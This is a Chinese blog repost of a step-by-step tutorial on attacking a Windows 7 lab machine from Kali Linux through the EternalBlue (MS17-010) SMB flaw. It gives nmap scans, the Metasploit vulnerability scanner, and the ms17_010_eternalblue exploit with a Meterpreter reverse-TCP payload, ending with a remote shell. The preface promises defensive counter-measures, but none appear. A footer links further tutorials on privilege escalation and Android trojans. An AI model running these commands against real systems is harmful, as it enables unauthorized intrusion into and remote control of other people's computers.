kali入侵win7(转载)

这篇具有很好参考价值的文章主要介绍了kali入侵win7(转载)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言:

本文的目的并不是教会学者入侵win7主机,

而是被入侵之后怎么反制并且做好下一步的防范

以及查到攻击者的蛛丝马迹

攻击原理:

利用未修复永恒之蓝的445端口漏洞入侵目标主机

演示设备:

主机 IP
kali Linux 10.11.4.3
Windows7 10.11.4.152

(win7条件为无防火墙,无杀软)

攻击前准备:

  1. 扫描目标网段
  2. 扫描目标IP
  3. 使用msf工具的aux模块来测试目标是否能被正常攻击

1.1)--->扫描目标网段

开启kali终端输入

nmap -sP 10.11.4.0/24

nmap的参数-sP较为快速,意为进行ping扫描,打印出对扫描做出响应的主机,但不做进一步测试(如端口扫描或者操作系统探测)。

得到结果为

kali入侵win7(转载)

得到两个IP地址,一个为本机kali的IP地址10.11.4.3,另一个则为win7的IP地址10.11.4.152

1.2)--->扫描目标IP

在kali终端输入nmap -O 10.11.4.152

nmap的参数-O为系统类型扫描,同样会列出端口详细信息。

得到结果为:

kali入侵win7(转载)

可以看到要利用的445端口为open,即打开状态

1.3)--->使用msf工具的aux模块来测试目标是否能被正常攻击

输入msfconsole进入到msf工具

kali入侵win7(转载)

每次打开msf工具的图案都不相同,无须担心

搜寻相关的攻击辅助模块以及攻击模块

输入:

search ms17

得到:

kali入侵win7(转载)

第1个为扫描检测漏洞辅助模块(下标为1),第2个为要使用的攻击模块(eternalblue永恒之蓝)

加载扫描检测漏洞辅助模块

输入:

use auxiliary/scanner/smb/smb_ms17_010

得到:

kali入侵win7(转载)

进入到加载扫描检测漏洞辅助模块

检测需要传入什么参数

kali入侵win7(转载)

只需传入rhost

在这需要传入的参数比较简单,传入要被检测的目标IP即可

输入:

set rhost 10.11.4.152

得到:

kali入侵win7(转载)

传入rhost

接着执行这个已经设置好参数的探测模块

输入:

run

得到:

kali入侵win7(转载)

翻译为: 主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)

Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)

至此已成功一大半,下面让我们进行对目标主机的攻击

  1. 进入攻击模
  2. 查看参数并传入参数
  3. 执行攻击

2.1)--->进入攻击模块

输入:

use exploit/windows/smb/ms17_010_eternalblue

得到:

kali入侵win7(转载)

2.2)--->查看参数并传入参数

输入:

show options

得到:

kali入侵win7(转载)

需要设置的参数为payload(攻击载荷),rhost(目标IP)

输入:

set payload windows/x64/meterpreter/reverse_tcp

得到:

kali入侵win7(转载)

payload只需要配置监听返回会话的IP

输入:

set rhosts 10.11.4.152

得到:

kali入侵win7(转载)

设置目标IP

2.3)--->执行攻击

输入:

exploit

得到:

kali入侵win7(转载)

如果网络不好的话会在这里卡一会,或者目标系统有杀软的话,就会卡在这里

kali入侵win7(转载)

出现最下面的=-=-=-WIN=-=-=-就代表已成功拿到权限文章来源地址https://www.toymoban.com/news/detail-439720.html

到了这里,关于kali入侵win7(转载)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • 永恒之蓝(ms17-010)借助kali进行攻击win7实验报告

    永恒之蓝(ms17-010)借助kali进行攻击win7实验报告

    学习kali和了解病毒永恒之蓝(ms17-010) 1.搭建环境win7 和 kali,两台虚拟机需要处于同一内网(这里我使用的网络适配器都是NAT模式) 2.确保两台虚拟机在同一内网 win7和kali 3.使用kali ,打开终端,输入msfconsole(渗透测试工具) 4.对永恒之蓝(ms17-010) 进行搜索 auxiliary(辅助

    2024年02月12日
    浏览(13)
  • 通过Kali利用serv-u漏洞获取win7系统管理员权限

    通过Kali利用serv-u漏洞获取win7系统管理员权限

    serv-u5.0.0.0版本下载链接:https://pan.baidu.com/s/1kRyByC1SbipRMrbLdd6f1w 提取码:m4of 环境说明 机器 ip地址 Kali主机 192.168.231.129 win7靶机 192.168.231.143 (一)、进行serv-u程序的安装和配置 1.首先将压缩包中的三个文件拖到win7中,包括一个serv-u程序的setup,还有两个txt文档; 2.然后双击s

    2024年02月08日
    浏览(14)
  • Kali Linux利用MSF入侵安卓手机

    Kali Linux利用MSF入侵安卓手机

    Kali Linux利用MSF入侵安卓手机 一、什么是msf msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 演示

    2024年02月10日
    浏览(11)
  • Kali Linux使用MSF木马入侵安卓手机

    Kali Linux使用MSF木马入侵安卓手机

    声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正。 Kali Linux 安卓手机一部(安卓11) 要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的 CSDN博主「Lisa

    2024年01月24日
    浏览(11)
  • Win11新建不了文本文档?Win11右键无法新建文本文档的解决方法

    Win11新建不了文本文档?Win11右键无法新建文本文档的解决方法

    ​Win11系统具有稳定、速度快、系统干净等特点,深受用户的喜爱,但是在使用中难免会出现一些问题,就比如右键无法新建文本文档的情况,出现这一情况的原因很有可能是由于系统文件缺失问题,对此我们一起来看看小编是如何解决的吧。 还有详细的一键重装系统方法

    2024年02月08日
    浏览(10)
  • win7装xp(win7装xp双系统教程)

    这是两个系统并且互相不冲突,win7是XP的升级,功能更强大,只要你的电脑配置够了就可以装,内存最低4G! 一样,差不太多,只不过WIN安装前要保证C盘在40-50G吧并且要NTFS格式的 XP下安装windows7 安装前说明: 1、先装XP,再装Windows 7,最好不要反过来,不然XP不会把Windows 7的

    2024年02月05日
    浏览(10)
  • win7路由器设置图解 win7路由器怎么设置

    win7电脑电脑直接连接网络时也许可以上网,但连接上路由器也许就不能上网了。如果你按设置win XP的电脑同样的方法设置win7的电脑,是不可以的。所以win7怎么设置路由器呢? win7怎么设置路由器 的问题是网友们都比较关心的话题,因为应用win7系统的人越来越多,随之而来的

    2024年02月05日
    浏览(8)
  • office365在win7上使用订阅+win7在线升级win10就用它(亲测有效)

    office365在win7上使用订阅+win7在线升级win10就用它(亲测有效)

    前言: 作为office365的重度使用用户,最近两天订阅到期,续订之后一直显示无法验证此订阅(仅查看),office365未经授权,大多数功能已停用,狂晕!!! 在微软官网上获知2020年1月14日起已不再提供office365对Windows7计算机的支持. 好吧,官方下载win10工具准备升级,下载地址

    2024年02月06日
    浏览(10)
  • Win7缺失dll文件如何修复?Win7计算机丢失dll文件怎么办

    Win7缺失dll文件如何修复?Win7计算机丢失dll文件怎么办

    电脑已经成为人们生活中必不可少的工具之一,但是在使用过程中难免会遇到一些问题,比如在打开某些程序或软件的时候,Win7系统会提示缺少某dll文件,这该怎么办?下面我就给大家讲讲如何来解决dll文件缺失的问题。 解决方法一: 比较直的做法是,缺少什么dll文件,就

    2024年02月05日
    浏览(49)
  • win7系统封装

    win7系统封装

    为了搞个自用的win7安装镜像于是摸索了下系统封装,教程如下 win7 系统下载 我们到MSDN去下载win 7镜像 (用迅雷复制如下连接下载即可) 2. 选择流派 驱动总裁这边的SC封装工具+DC驱动总裁win7离线精简版(封装专用) https://www.sysceo.com IT天空ES5S封装工具+IT天空的万能驱动 htt

    2023年04月14日
    浏览(7)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包